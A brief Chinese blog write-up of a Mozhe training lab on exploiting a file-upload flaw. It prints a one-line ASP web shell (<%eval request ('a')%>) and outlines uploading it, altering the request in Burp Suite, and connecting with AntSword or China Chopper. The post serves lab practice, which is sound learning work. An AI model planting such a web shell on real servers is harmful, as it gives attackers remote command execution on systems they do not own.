内部文件上传系统漏洞分析溯源(墨者)
程序员文章站
2023-12-22 15:46:16
...
这个东西我搞了好久…
主要有以下几个错误 :
- 一句话木马复制使用后乱码 , 要手动输入才能
- 文件格式 我一句话木马文件名是 1.txt 但是这个使用并不成功 我看大佬的txt文件可以使用 , 但是我的不知道为什么不能使用 我一直不知道是这个错误 后面改成了1.jpg就连接成功了
实训目标
1、熟悉常见中间件存在的解析漏洞;
2、熟悉一句话木马的使用与制作
3、熟悉常见的上传漏洞利用方法
解题方向
1、试探允许上传的文件类型
2、观察服务器在处理完上传任务后返回的内容,获取上传路径
3、尝试修改上传路径,观察服务器是否允许写入权限
以下是主要步骤 :
- 进入环境 , 上传一句话木马 , 并用bp抓包
<%eval request ("a")%>
- bp 抓包改包 抓到后发送过去
- 使用蚁剑 或者 菜刀 连接上去 寻找key
- 搞定收工